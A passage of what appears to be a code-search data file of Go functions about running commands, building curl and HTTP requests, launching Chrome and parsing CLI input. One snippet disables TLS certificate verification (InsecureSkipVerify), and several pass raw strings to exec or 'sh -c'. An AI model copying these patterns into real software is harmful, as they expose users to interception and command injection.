exec.Command(\"go\", \"get\", url)\n err := c.Run()\n if err != nil {\n println(err)\n os.Exit(3)\n }\n\n return nil\n}", "func (a *AGI) Command(cmd ...string) (resp *Response) {\n\tresp = &Response{}\n\n\ta.mu.Lock()\n\tdefer a.mu.Unlock()\n\n\tcmdString := strings.Join(cmd, \" \") + \"\\n\"\n\t_, err := a.w.Write([]byte(cmdString))\n\tif err != nil {\n\t\tresp.Error = errors.Wrap(err, \"failed to send command\")\n\t\treturn\n\t}\n\n\ts := bufio.NewScanner(a.r)\n\tfor s.Scan() {\n\t\traw := s.Text()\n\t\tif raw == \"\" {\n\t\t\tbreak\n\t\t}\n\n\t\t// Parse and store the result code\n\t\tpieces := responseRegex.FindStringSubmatch(raw)\n\t\tif pieces == nil {\n\t\t\tresp.Error = fmt.Errorf(\"failed to parse result: %s\", raw)\n\t\t\treturn\n\t\t}\n\n\t\t// Status code is the first substring\n\t\tresp.Status, err = strconv.Atoi(pieces[1])\n\t\tif err != nil {\n\t\t\tresp.Error = errors.Wrap(err, \"failed to get status code\")\n\t\t\treturn\n\t\t}\n\n\t\t// Result code is the second substring\n\t\tresp.ResultString = pieces[2]\n\t\t// FIXME: DTMF result maybe has \"#\"(35), \"*\" or \"\"(GetData #). But not perfect to just judge by contains string.\n\t\tif resp.ResultString != \"\" && !strings.Contains(resp.ResultString, \"35\") && !strings.Contains(resp.ResultString, \"*\") {\n\t\t\tresp.Result, err = strconv.Atoi(pieces[2])\n\t\t\tif err != nil {\n\t\t\t\tresp.Error = errors.Wrap(err, \"failed to parse status code as an integer\")\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\n\n\t\t// Value is the third (and optional) substring\n\t\twrappedVal := strings.TrimSpace(pieces[3])\n\t\tresp.Value = strings.TrimSuffix(strings.TrimPrefix(wrappedVal, \"(\"), \")\")\n\n\t\t// FIXME: handle multiple line return values\n\t\tbreak // nolint\n\t}\n\n\t// If the Status code is not 200, return an error\n\tif resp.Status != 200 {\n\t\tresp.Error = fmt.Errorf(\"Non-200 status code\")\n\t}\n\treturn\n}", "func Execute(method string, url string, bearer string) (resp *http.Response, err error) {\n\n\t// Create a new request using http\n\treq, err := http.NewRequest(\"GET\", url, nil)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t// add authorization header to the req\n\treq.Header.Add(\"Authorization\", bearer)\n\n\t// Send req using http Client\n\ttransCfg := &http.Transport{\n\t\tTLSClientConfig: &tls.Config{InsecureSkipVerify: true}, // ignore expired SSL certificates\n\t}\n\tclient := &http.Client{Transport: transCfg}\n\tresp, err = client.Do(req)\n\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\treturn\n}", "func NewGetCommand(c Command, run RunGetFunc, subCommands SubCommands, mod ...CommandModifier) *cobra.Command {\n\treturn newCommand(c, run, subCommands, mod...)\n}", "func Command(url string, dataDir, cacheDir string, arg ...string) *Cmd {\n\tonce.Do(findChrome)\n\tif chrome == \"\" {\n\t\treturn nil\n\t}\n\n\tprefs := filepath.Join(dataDir, \"Default\", \"Preferences\")\n\tif _, err := os.Stat(prefs); errors.Is(err, fs.ErrNotExist) {\n\t\tif err := os.MkdirAll(filepath.Dir(prefs), 0700); err == nil {\n\t\t\tos.WriteFile(prefs, []byte(`{\n\t\t\t\t\"profile\": {\"cookie_controls_mode\": 1},\n\t\t\t\t\"search\": {\"suggest_enabled\": false},\n\t\t\t\t\"signin\": {\"allowed_on_next_startup\": false},\n\t\t\t\t\"enable_do_not_track\": true\n\t\t\t}`), 0600)\n\t\t}\n\t}\n\n\t// https://peter.sh/experiments/chromium-command-line-switches/\n\t// https://github.com/GoogleChrome/chrome-launcher/blob/master/docs/chrome-flags-for-tools.md\n\t// https://source.chromium.org/chromium/chromium/src/+/master:chrome/test/chromedriver/chrome_launcher.cc\n\targ = append([]string{\n\t\t\"--app=\" + url,\n\t\t\"--user-data-dir=\" + dataDir,\n\t\t\"--disk-cache-dir=\" + cacheDir,\n\t\t\"--class=\" + strconv.FormatUint(rand.Uint64(), 16),\n\t\t\"--incognito\", \"--inprivate\", \"--bwsi\", \"--remote-debugging-port=0\",\n\t\t\"--no-first-run\", \"--no-default-browser-check\", \"--no-service-autorun\", \"--no-pings\",\n\t\t\"--disable-sync\", \"--disable-breakpad\", \"--disable-extensions\", \"--disable-default-apps\",\n\t\t\"--disable-component-extensions-with-background-pages\", \"--disable-background-networking\",\n\t\t\"--disable-domain-reliability\", \"--disable-client-side-phishing-detection\", \"--disable-component-update\",\n\t}, arg...)\n\n\tcmd := exec.Command(chrome, arg...)\n\treturn &Cmd{cmd: cmd, url: origin(url)}\n}", "func (b *Builder) CurlCmd(req *Request) (*exec.Cmd, error) {\n\n\targs := make([]string, 0)\n\n\t// ... method\n\targs = append(args, fmt.Sprintf(\"-X%s\", req.Method))\n\n\t// ... headers\n\tfor name, value := range req.Header {\n\t\targs = append(args, \"-H\")\n\t\targs = append(args, fmt.Sprintf(\"%s: %s\", name, value))\n\t}\n\n\tif len(req.Body) > 0 && (req.Method == \"POST\" || req.Method == \"PUT\") {\n\t\targs = append(args, \"--data\")\n\t\targs = append(args, req.Body)\n\t}\n\n\t// ... path\n\tpath := fmt.Sprintf(\"%s/%s\", req.Host, url.PathEscape(req.Path))\n\n\t// ... query\n\tquery := req.QueryString()\n\tif query != \"\" {\n\t\tpath = fmt.Sprintf(\"%s?%s\", path, query)\n\t}\n\targs = append(args, path)\n\n\treturn exec.Command(b.curl, args...), nil\n}", "func HaproxyCmd(cmd string) (string, error){\n\n\n\t// connect to haproxy\n\tconn, err_conn := net.Dial(\"unix\", \"/tmp/haproxy.stats.sock\")\n\tdefer conn.Close()\n\n\tif err_conn != nil {\n\t\treturn \"\", errors.New(\"Unable to connect to Haproxy socket\")\n\t} else {\n\n\t\tfmt.Fprint(conn, cmd)\n\n\t\tresponse := \"\"\n\n\t\tscanner := bufio.NewScanner(conn)\n\t\tfor scanner.Scan() {\n\t\t\tresponse += (scanner.Text() + \"\\n\")\n\t\t}\n\t\tif err := scanner.Err(); err != nil {\n\t\t\treturn \"\", err\n\t\t} else {\n\t\t\treturn response, nil\n\t\t}\n\n\t}\n}", "func Command(name string, arg ...string) Cmd {\n\treturn execCommand(name, arg...)\n}", "func (p *Process) CmdGet(pac teoapi.Packet) (err error) {\n\tdata := pac.RemoveTrailingZero(pac.Data())\n\trequest := cdb.KeyValue{Cmd: pac.Cmd()}\n\tif err = request.UnmarshalText(data); err != nil {\n\t\treturn\n\t}\n\t// Return only Value for text requests and all fields for json\n\tresponce := request\n\tif responce.Value, err = p.tcdb.Get(request.Key); err != nil {\n\t\treturn\n\t} else if !request.RequestInJSON {\n\t\t_, err = p.tcdb.con.SendAnswer(pac, pac.Cmd(), responce.Value)\n\t} else if retdata, err := responce.MarshalText(); err == nil {\n\t\t_, err = p.tcdb.con.SendAnswer(pac, pac.Cmd(), retdata)\n\t}\n\treturn\n}", "func runCmd(cmdStr string) string {\n\tparts := strings.Split(cmdStr, \" \")\n\tcmdCmd := parts[0]\n\tcmdArgs := parts[1:]\n\tcmd := exec.Command(cmdCmd, cmdArgs...)\n\tout, err := cmd.CombinedOutput()\n\tif err != nil {\n\t\tlog.Fatal(err.Error() + \"\\n\" + string(out))\n\t}\n\treturn string(out)\n}", "func (s *Server) parseSlashCommand(r *http.Request) (*SlashCommand, error) {\n\n\tsc := &SlashCommand{}\n\n\t// parse data from the HTTP request\n\terr := r.ParseForm()\n\tif err != nil {\n\t\treturn sc, err\n\t}\n\n\t// load form data into a SlashCommand struct\n\tsc.ChannelID = r.Form.Get(\"channel_id\")\n\tsc.ChannelName = r.Form.Get(\"channel_name\")\n\tsc.Command = r.Form.Get(\"command\")\n\tsc.TeamDomain = r.Form.Get(\"team_domain\")\n\tsc.TeamID = r.Form.Get(\"team_id\")\n\tsc.Text = r.Form.Get(\"text\")\n\tsc.Token = r.Form.Get(\"token\")\n\tsc.UserID = r.Form.Get(\"user_id\")\n\tsc.UserName = r.Form.Get(\"user_name\")\n\n\treturn sc, nil\n}", "func (c *HTTPClient) exec(name string, params map[string]string, body io.Reader) (Response, error) {\n\turl := *c.url\n\turl.Path = path.Join(url.Path, name)\n\tif len(params) != 0 {\n\t\tquery := url.Query()\n\t\tfor k, v := range params {\n\t\t\tquery.Add(k, v)\n\t\t}\n\t\turl.RawQuery = query.Encode()\n\t}\n\tif body == nil {\n\t\tresp, err := c.client.Get(url.String())\n\t\tif err != nil {\n\t\t\treturn nil, NewError(NetworkError, \"http.Client.Get failed.\", map[string]interface{}{\n\t\t\t\t\"url\": url.String(),\n\t\t\t\t\"error\": err.Error(),\n\t\t\t})\n\t\t}\n\t\treturn newHTTPResponse(resp)\n\t}\n\tresp, err := c.client.Post(url.String(), \"application/json\", body)\n\tif err != nil {\n\t\treturn nil, NewError(NetworkError, \"http.Client.Post failed.\", map[string]interface{}{\n\t\t\t\"url\": url.String(),\n\t\t\t\"error\": err.Error(),\n\t\t})\n\t}\n\treturn newHTTPResponse(resp)\n}", "func GetcommandB(comm string, args string) (command []string, err error) {\n\tif comm == \"\" {\n\t\treturn nil, errors.New(\"Not valid Command \")\n\t}\n\tcommand = append(command, \"/\"+comm)\n\tif args != \"\" {\n\t\ts := strings.Split(args, \" \")\n\t\tcommand = append(command, s...)\n\t}\n\treturn command, nil\n}", "func CmdRun(command string) {\r\n\tparts := strings.Fields(command)\r\n\thead := parts[0]\r\n\tparts = parts[1:]\r\n\tcmd := exec.Command(head, parts...)\r\n\toutput, err := cmd.CombinedOutput()\r\n\tif err != nil {\r\n\t\tPrintError(err.Error())\r\n\t\tfmt.Println(string(output))\r\n\t} else {\r\n\t\tfmt.Println(string(output))\r\n\t}\r\n}", "func Curl(url, dest, optionals string) {\n\tcurlExec, err := exec.LookPath(\"curl\")\n\tCheckError(err)\n\n\t//fmt.Println(curlExec, \"-o\", dest, optionals, urlencode(url))\n\t_, err = exec.Command(curlExec, \"-o\", dest, optionals, url).Output()\n\tCheckError(err)\n}", "func ParseCmdHttps() {\n\t// check args number\n\tif len(os.Args) == 2 {\n\t\thttpsCmd.Usage()\n\t\tos.Exit(1)\n\t}\n\t// parse command https\n\terr := httpsCmd.Parse(os.Args[2:])\n\tif err != nil {\n\t\tlog.Println(\"Error Parse Https Command.\")\n\t\tos.Exit(1)\n\t}\n\t// handle command parameters\n\thandleCmdHttps(httpsIp, httpsPort)\n}", "func Command() ([]string, []string) {\n\tvar cmd []string\n\tif flag.NArg() > 1 {\n\t\tcmd = flag.Args()[1:]\n\t}\n\tif *entrypoint != \"\" {\n\t\treturn []string{*entrypoint}, cmd\n\t}\n\treturn nil, cmd\n}", "func ExecuteGoGet(address string) error {\n\targs := strings.Split(address, \" \")\n\tcmd := exec.Command(args[0], args[1:]...)\n\tcmd.Env = os.Environ()\n\tcmd.Stdout = os.Stdout\n\tcmd.Stderr = os.Stderr\n\treturn cmd.Run()\n}", "func (c *Controller) Get(_ context.Context, command string) (interface{}, error) {\n\tif !c.Config.AllowAll && !c.Commands.Lookup(command) {\n\t\treturn nil, errors.NewForbidden(fmt.Errorf(\"command %q is not allowed\", command))\n\t}\n\n\tcmd := exec.Command(\"sh\", \"-c\", command) // \"sh\", \"-c\", \"cd .. && ls -la\"\n\tstdin, err := cmd.StdinPipe()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tgo func() {\n\t\tdefer stdin.Close()\n\t\tio.WriteString(stdin, \"values written to stdin are passed to cmd's standard input\")\n\t}()\n\n\tout, err := cmd.CombinedOutput()\n\tif err != nil {\n\t\treturn err, nil\n\t}\n\n\treturn out, nil\n}", "func CLI() {\n\tfor {\n\t\tfmt.Printf(sep)\n\t\tfmt.Printf(\"Please enter the path to GET\\n\")\n\t\tinput := readStringStdin()\n\t\tif input == \"\" {\n\t\t\tbreak\n\t\t}\n\t\tval, err := getThis(input)\n\t\tif err != nil {\n\t\t\tlog.Println(err)\n\t\t}\n\t\tfmt.Printf(\"Response: %s\\n\", val)\n\t}\n}", "func RunCommand(custom string) (string, error) {\r\n custom = strings.TrimSpace(strings.TrimSuffix(custom, \"$\"))\r\n pieces := strings.Split(custom, \" \")\r\n cmd := exec.Command(pieces[0])\r\n cmd.Args = pieces\r\n cmd.Stdin = os.Stdin\r\n output, oops := cmd.CombinedOutput()\r\n return string(output), oops\r\n}", "func GetURL(name string) func(*types.Cmd) {\n\treturn func(g *types.Cmd) {\n\t\tg.AddOptions(\"get-url\")\n\t\tg.AddOptions(name)\n\t}\n}", "func Command(command string, args ...string) *exec.Cmd { return runner.Command(command, args...) }", "func ParseCmd(l []byte, lenght int) (string, int) {\n\tline := string(l[:lenght])\n\tline = strings.ToLower(line)\n\tline = strings.TrimSpace(line)\n\tcmds := strings.Split(line, \" \")\n\n\tfmt.Println(cmds)\n\n\tif len(cmds) == 0 {\n\t\tfmt.Println(\"Qui0...\" + cmds[0])\n\t\treturn StrInvalidCommand, InvalidCommand\n\t}\n\n\tcommand, ok := Table[strings.TrimSpace(cmds[0])]\n\tif !ok {\n\t\tfmt.Println(\"Qui...\" + cmds[0])\n\t\treturn StrCommandNotFound, CommandNotFound\n\t}\n\n\treturn command(cmds[1:])\n}", "func MGetCacheCmd(c Cacheable) string {\n\tif c.cs.s[0][0] == 'J' {\n\t\treturn \"JSON.GET\" + c.cs.s[len(c.cs.s)-1]\n\t}\n\treturn \"GET\"\n}", "func GetQueryCmdRequest(route string, cdc *codec.Codec) *cobra.Command {\n\treturn &cobra.Command{\n\t\tUse: \"request [id]\",\n\t\tArgs: cobra.ExactArgs(1),\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tcliCtx := context.NewCLIContext().WithCodec(cdc)\n\t\t\tbz, _, err := cliCtx.Query(fmt.Sprintf(\"custom/%s/%s/%s\", route, types.QueryRequests, args[0]))\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\treturn printOutput(cliCtx, cdc, bz, &types.QueryRequestResult{})\n\t\t},\n\t}\n}", "func ParseCmdRequest(b []byte) (*CmdRequest, error) {\n\tif len(b) < 7 {\n\t\treturn nil, errors.New(\"short cmd request\")\n\t}\n\tif b[0] != Version5 {\n\t\treturn nil, errors.New(\"unexpected protocol version\")\n\t}\n\tif Command(b[1]) != CmdConnect {\n\t\treturn nil, errors.New(\"unexpected command\")\n\t}\n\tif b[2] != 0 {\n\t\treturn nil, errors.New(\"non-zero reserved field\")\n\t}\n\treq := &CmdRequest{Version: int(b[0]), Cmd: Command(b[1])}\n\tl := 2\n\toff := 4\n\tswitch b[3] {\n\tcase AddrTypeIPv4:\n\t\tl += net.IPv4len\n\t\treq.Addr.IP = make(net.IP, net.IPv4len)\n\tcase AddrTypeIPv6:\n\t\tl += net.IPv6len\n\t\treq.Addr.IP = make(net.IP, net.IPv6len)\n\tcase AddrTypeFQDN:\n\t\tl += int(b[4])\n\t\toff = 5\n\tdefault:\n\t\treturn nil, errors.New(\"unknown address type\")\n\t}\n\tif len(b[off:]) < l {\n\t\treturn nil, errors.New(\"short cmd request\")\n\t}\n\tif req.Addr.IP != nil {\n\t\tcopy(req.Addr.IP, b[off:])\n\t} else {\n\t\treq.Addr.Name = string(b[off : off+l-2])\n\t}\n\treq.Addr.Port = int(b[off+l-2])<<8 | int(b[off+l-1])\n\treturn req, nil\n}", "func SubCmd(m map[string]Cmd) {\n\tprog := os.Args[0]\n\n\t// Supply the default \"help\" command if there is not one.\n\t_, ok := m[\"help\"]\n\tif !ok {\n\t\tm[\"help\"] = newHelp(prog, m)\n\t}\n\n\t// Show list of available commands when there is no argument.\n\tif len(os.Args) <= 1 {\n\t\tfmt.Fprintf(os.Stderr, \"Available subcommands of %s:\\n\", prog)\n\t\tprintUsage(m, \"\")\n\t\tos.Exit(1)\n\t}\n\n\t// Find and run the command.\n\tcmd := os.Args[1]\n\tsub, ok := m[cmd]\n\tif !ok {\n\t\tfmt.Fprintf(os.Stderr, \"Unrecognized subcommand: %q. Run without arguments to see available subcommands. These subcommands partially match yours:\\n\", cmd)\n\t\tprintUsage(m, cmd)\n\t\tos.Exit(1)\n\t}\n\tsub.Action(os.Args[2:])\n}", "func cmdParse(commandStr string, config *Config) (*Command, error) {\n\t// TODO: criteria\n\n\tlexer := lex(commandStr)\n\tdefer lexer.drain()\n\n\tcmdToken := lexer.nextItem()\n\tif cmdToken.typ != itemString {\n\t\treturn nil, fmt.Errorf(\"expected string, got token '%s'\", cmdToken.val)\n\t}\n\n\t// TODO: chained commands\n\tcommand := &Command{}\n\n\tfn, ok := cmdParseTable[cmdToken.val]\n\n\tif !ok {\n\t\treturn nil, fmt.Errorf(\"command '%s' not implemented\", cmdToken.val)\n\t}\n\n\tcmd, err := fn(lexer, config)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tcommand.Executer = cmd\n\n\treturn command, nil\n}", "func (cli *CLI) CallCmd(cmd string) {\n\tcm := NewCliCmd(cmd)\n\tcli.router(cm)\n}", "func GetCommand() *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"mho get [args]\",\n\t\tShort: \"ONOS MHO subsystem commands\",\n\t}\n\n\tcli.AddConfigFlags(cmd, defaultAddress)\n\tcmd.AddCommand(getGetCommand())\n\tcmd.AddCommand(loglib.GetCommand())\n\treturn cmd\n}", "func parseCommand(cmdLine string) (param string) {\n\tvar result = map[string]map[string]string{}\n\tjson.Unmarshal([]byte(cmdLine), &result)\n\n\t// Print the data type of result variable\n\tswitch {\n\tcase result[\"query\"][\"region\"] != \"\":\n\t\tparam = result[\"query\"][\"region\"]\n\tcase result[\"query\"][\"date\"] != \"\":\n\t\tparam = result[\"query\"][\"date\"]\n\tdefault:\n\t\tparam = \"\"\n\t}\n\n\treturn\n}", "func parseAndExecInput(input string) {\n\t// Split the line into 2 tokens (cmd and message)\n\ttokens := strings.SplitN(input, \" \", 2)\n\tcmd := tokens[0]\n\n\tswitch {\n\tcase cmd == \"\":\n\t\tbreak\n\tcase cmd == \"?\":\n\t\tfmt.Printf(helpStr)\n\t\tbreak\n\tcase strings.ToLower(cmd) == \"/users\":\n\t\tfmt.Println(USERS)\n\t\tbreak\n\tcase strings.ToLower(cmd) == \"/exit\":\n\t\tos.Exit(1)\n\t\tbreak\n\tcase cmd[0] == '@':\n\t\t// TODO-WORKSHOP-STEP-9: Write code to sendChat. Example\n\t\t// \"@gautam hello golang\" should send a message to handle with name \"gautam\" and message \"hello golang\"\n\t\t// Invoke sendChat to send the message\n\t\tbreak\n\tcase strings.ToLower(cmd) == \"/help\":\n\t\tfmt.Println(helpStr)\n\t\tbreak\n\tdefault:\n\t\tfmt.Println(helpStr)\n\t}\n}", "func (c *Command) run(cmd, path string, clearStack bool) error {\n\tif c.specialCmd(cmd, path) {\n\t\treturn nil\n\t}\n\tcmds := strings.Split(cmd, \" \")\n\tcommand := strings.ToLower(cmds[0])\n\tgvr, v, err := c.viewMetaFor(command)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tswitch command {\n\tcase \"ctx\", \"context\", \"contexts\":\n\t\tif len(cmds) == 2 {\n\t\t\treturn useContext(c.app, cmds[1])\n\t\t}\n\t\treturn c.exec(cmd, gvr, c.componentFor(gvr, path, v), clearStack)\n\tcase \"dir\":\n\t\tif len(cmds) != 2 {\n\t\t\treturn errors.New(\"You must specify a directory\")\n\t\t}\n\t\treturn c.app.dirCmd(cmds[1])\n\tdefault:\n\t\t// checks if Command includes a namespace\n\t\tns := c.app.Config.ActiveNamespace()\n\t\tif len(cmds) == 2 {\n\t\t\tns = cmds[1]\n\t\t}\n\t\tif err := c.app.switchNS(ns); err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif !c.alias.Check(command) {\n\t\t\treturn fmt.Errorf(\"`%s` Command not found\", cmd)\n\t\t}\n\t\treturn c.exec(cmd, gvr, c.componentFor(gvr, path, v), clearStack)\n\t}\n}", "func GetCmdQueryPrice(queryRoute string, cdc *codec.Codec) *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: oracle.QueryPrice,\n\t\tArgs: cobra.NoArgs,\n\t\tShort: \"Query the current Luna exchange rate w.r.t an asset\",\n\t\tLong: strings.TrimSpace(`\nQuery the current exchange rate of Luna with an asset. You can find the current list of active denoms by running: terracli query oracle active\n\n$ terracli query oracle price --denom ukrw\n`),\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tcliCtx := context.NewCLIContext().WithCodec(cdc)\n\n\t\t\tdenom := viper.GetString(flagDenom)\n\t\t\tif denom == \"\" {\n\t\t\t\treturn fmt.Errorf(\"--denom flag is required\")\n\t\t\t}\n\n\t\t\tres, err := cliCtx.QueryWithData(fmt.Sprintf(\"custom/%s/%s/%s\", queryRoute, oracle.QueryPrice, denom), nil)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tvar price oracle.QueryPriceResponse\n\t\t\tcdc.MustUnmarshalJSON(res, &price)\n\t\t\treturn cliCtx.PrintOutput(price)\n\t\t},\n\t}\n\n\tcmd.Flags().String(flagDenom, \"\", \"target denom to get the price\")\n\n\tcmd.MarkFlagRequired(flagDenom)\n\treturn cmd\n}", "func (m *Command) URL() string { return m.API.Node().URI.String() }", "func (s *server) GetExec(req *runtimeapi.ExecRequest) (*runtimeapi.ExecResponse, error) {\n\t// TODO: validate the request.\n\ttoken, err := s.cache.Insert(req)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &runtimeapi.ExecResponse{\n\t\tUrl: s.buildURL(\"exec\", token),\n\t}, nil\n}", "func apiURL(cmd, path string, args []string) string {\n\tif len(args) > 0 {\n\t\tvar arglist string\n\t\tfor i := 0; i < len(args); i++ {\n\t\t\targlist += fmt.Sprintf(\"&%s\", args[i])\n\t\t}\n\t\treturn fmt.Sprintf(\"http://%s/api/v0/%s?arg=%s&%s\", defaultIPFSHost, cmd, path, arglist)\n\t}\n\treturn fmt.Sprintf(\"http://%s/api/v0/%s?arg=%s\", defaultIPFSHost, cmd, path)\n}", "func (r *Routine) runCmd() (string, error) {\n\tcmd := exec.Command(\"amixer\", \"get\", r.control)\n\tout, err := cmd.Output()\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\treturn string(out), nil\n}", "func Command(handler handlers.CommandHandler) starlark.Fn {\n\treturn func(thread *lib.Thread, b *lib.Builtin, args lib.Tuple, kwargs []lib.Tuple) (lib.Value, error) {\n\t\tctx := starlark.GetCtx(thread)\n\t\tdryrun := starlark.GetDryRunMode(thread)\n\t\tparams, err := parseArgs(b, args, kwargs)\n\t\tif err != nil {\n\t\t\treturn lib.None, xerrors.Errorf(\": %w\", err)\n\t\t}\n\t\tzap.L().Debug(\n\t\t\t\"params\",\n\t\t\tzap.String(\"cmd\", params.CmdName),\n\t\t\tzap.Strings(\"args\", params.CmdArgs),\n\t\t\tzap.String(\"user\", params.User),\n\t\t\tzap.String(\"cwd\", params.Cwd),\n\t\t)\n\n\t\tbuf := new(bytes.Buffer)\n\t\tfor _, arg := range params.CmdArgs {\n\t\t\tfmt.Fprintf(buf, \" %s\", arg)\n\t\t}\n\t\tfmt.Fprint(buf, \"\\n\")\n\t\tui.Infof(\"Executing command: %s%s\", params.CmdName, buf.String())\n\t\tif err := handler.Command(ctx, dryrun, params); err != nil {\n\t\t\treturn lib.None, xerrors.Errorf(\": %w\", err)\n\t\t}\n\t\treturn lib.None, nil\n\t}\n}", "func (p *Parser) Parse(str string) (Command, []string, error) {\n\tvar cmd Command\n\targs := p.extractArgs(str)\n\n\tswitch strings.ToUpper(args[0]) {\n\tcase \"HELP\":\n\t\tcmd = &Help{parser: p}\n\tcase \"DEL\":\n\t\tcmd = &Del{strg: p.strg}\n\tcase \"EXPIRE\":\n\t\tcmd = &Expire{clck: p.clck, strg: p.strg}\n\tcase \"GET\":\n\t\tcmd = &Get{strg: p.strg}\n\tcase \"SET\":\n\t\tcmd = &Set{strg: p.strg}\n\tcase \"STRLEN\":\n\t\tcmd = &Strlen{strg: p.strg}\n\tcase \"GETBIT\":\n\t\tcmd = &GetBit{strg: p.strg}\n\tcase \"SETBIT\":\n\t\tcmd = &SetBit{strg: p.strg}\n\tcase \"HGET\":\n\t\tcmd = &Hget{strg: p.strg}\n\tcase \"HKEYS\":\n\t\tcmd = &Hkeys{strg: p.strg}\n\tcase \"HSET\":\n\t\tcmd = &Hset{strg: p.strg}\n\tcase \"HVALS\":\n\t\tcmd = &Hvals{strg: p.strg}\n\tcase \"KEYS\":\n\t\tcmd = &Keys{strg: p.strg}\n\tcase \"LINDEX\":\n\t\tcmd = &Lindex{strg: p.strg}\n\tcase \"LLEN\":\n\t\tcmd = &Llen{strg: p.strg}\n\tcase \"LPOP\":\n\t\tcmd = &Lpop{strg: p.strg}\n\tcase \"LPUSH\":\n\t\tcmd = &Lpush{strg: p.strg}\n\tcase \"RPUSH\":\n\t\tcmd = &Rpush{strg: p.strg}\n\tcase \"RPOP\":\n\t\tcmd = &Rpop{strg: p.strg}\n\tcase \"LRANGE\":\n\t\tcmd = &Lrange{strg: p.strg}\n\tcase \"LREM\":\n\t\tcmd = &Lrem{strg: p.strg}\n\tcase \"TTL\":\n\t\tcmd = &TTL{strg: p.strg, clck: p.clck}\n\tcase \"TYPE\":\n\t\tcmd = &Type{strg: p.strg}\n\tcase \"PING\":\n\t\tcmd = &Ping{}\n\tdefault:\n\t\treturn nil, nil, ErrCommandNotFound\n\t}\n\n\treturn cmd, args[1:], nil\n}", "func (c *Client) CliURL(nut ssp.Nut, can string) string {\n\tparams := make(url.Values)\n\tif nut != \"\" {\n\t\tparams.Add(\"nut\", string(nut))\n\t}\n\tif can != \"\" {\n\t\tparams.Add(\"can\", can)\n\t}\n\tu := c.baseURL()\n\tu.Path = c.Qry\n\tif len(params) > 0 {\n\t\tu.RawQuery = params.Encode()\n\t}\n\treturn u.String()\n}", "func (m *Mothership) bin(request string) (string, error) {\n\tcommandList := strings.Split(m.CLICommand(), \" \")\n\tcommandList = append(commandList, strings.Split(request, \" \")...)\n\tcmd := exec.Command(commandList[0], commandList[1:]...)\n\tlogrus.Debugf(\"mothership command: %v\", cmd.Args)\n\n\tbyteOutput, err := cmd.CombinedOutput()\n\toutput := strings.TrimSuffix(string(byteOutput), \"\\n\")\n\tif err != nil {\n\t\treturn \"\", fmt.Errorf(\"error running mothership cmd: %s: %s, %v\", request, string(output), err)\n\t}\n\treturn string(output), nil\n}", "func HandleCmd(repositoryURL, repositoryBranch, internalDepURL, cmd string) string {\n\tif repositoryURL != \"\" && repositoryBranch != \"\" && cmd != \"\" {\n\t\treplace1 := strings.Replace(cmd, \"%GIT_REPO%\", repositoryURL, -1)\n\t\treplace2 := strings.Replace(replace1, \"%GIT_BRANCH%\", repositoryBranch, -1)\n\t\treplace3 := strings.Replace(replace2, \"%INTERNAL_DEP_URL%\", internalDepURL, -1)\n\t\treturn replace3\n\t}\n\treturn \"\"\n}", "func Cmd(num int, vrf int) string {\n\treturn fmt.Sprintf(\"curl -s -X POST http://127.0.0.1:9257/fwlog?\\\"num=%d&vrf=%d\\\"\", num, vrf)\n}", "func (t Template) GetExecutableCommand(req ExecutionRequest) (string, error) {\n\tvar (\n\t\terr error\n\t\tresult bytes.Buffer\n\t)\n\n\t// Get the request's custom fields.\n\tcustomFields := *req.GetExecutionRequestCustom()\n\texecutionPayload, ok := customFields[TemplatePayloadKey]\n\tif !ok || executionPayload == nil {\n\t\treturn \"\", err\n\t}\n\n\texecutionPayload, err = t.compositeUserAndDefaults(executionPayload)\n\n\tschemaLoader := gojsonschema.NewGoLoader(t.Schema)\n\tdocumentLoader := gojsonschema.NewGoLoader(executionPayload)\n\n\t// Perform JSON schema validation to ensure that the request's template\n\t// payload conforms to the template's JSON schema.\n\tvalidationResult, err := gojsonschema.Validate(schemaLoader, documentLoader)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\tif validationResult != nil && validationResult.Valid() != true {\n\t\tvar res []string\n\t\tfor _, resultError := range validationResult.Errors() {\n\t\t\tres = append(res, resultError.String())\n\t\t}\n\t\treturn \"\", errors.New(strings.Join(res, \"\\n\"))\n\t}\n\n\t// Create a new template string based on the template.Template.\n\ttextTemplate, err := template.New(\"command\").Funcs(sprig.TxtFuncMap()).Parse(t.CommandTemplate)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\t// Dump payload into the template string.\n\tif err = textTemplate.Execute(&result, executionPayload); err != nil {\n\t\treturn \"\", err\n\t}\n\n\treturn result.String(), nil\n}", "func Command(name string, args ...string) *Cmd {\n\treturn &Cmd{exec.Command(name, args...)}\n}", "func GoGet(importStr string, update bool, args ...string) error {\n\tseelog.Info(\"Getting: \" + importStr)\n\n\tvar cmd *exec.Cmd\n\n\tupdateArgs := []string{\"get\", \"-u\"}\n\treuseArgs := []string{\"get\"}\n\n\tif update {\n\t\tfor _, arg := range args {\n\t\t\tupdateArgs = append(updateArgs, arg)\n\t\t}\n\t\tupdateArgs = append(updateArgs, importStr)\n\t\tcmd = exec.Command(\"go\", updateArgs...)\n\t} else {\n\t\tfor _, arg := range args {\n\t\t\treuseArgs = append(reuseArgs, arg)\n\t\t}\n\t\treuseArgs = append(reuseArgs, importStr)\n\t\tcmd = exec.Command(\"go\", reuseArgs...)\n\t}\n\n\tvar outGet bytes.Buffer\n\tcmd.Stdout = &outGet\n\tvar outErr bytes.Buffer\n\tcmd.Stderr = &outGet\n\n\terr := cmd.Start()\n\tif err != nil {\n\t\tseelog.Info(err)\n\t}\n\n\terr = cmd.Wait()\n\tif outGet.String() != \"\" {\n\t\tseelog.Info(outGet.String())\n\t}\n\tif outErr.String() != \"\" {\n\t\tseelog.Info(outErr.String())\n\t}\n\tif err != nil 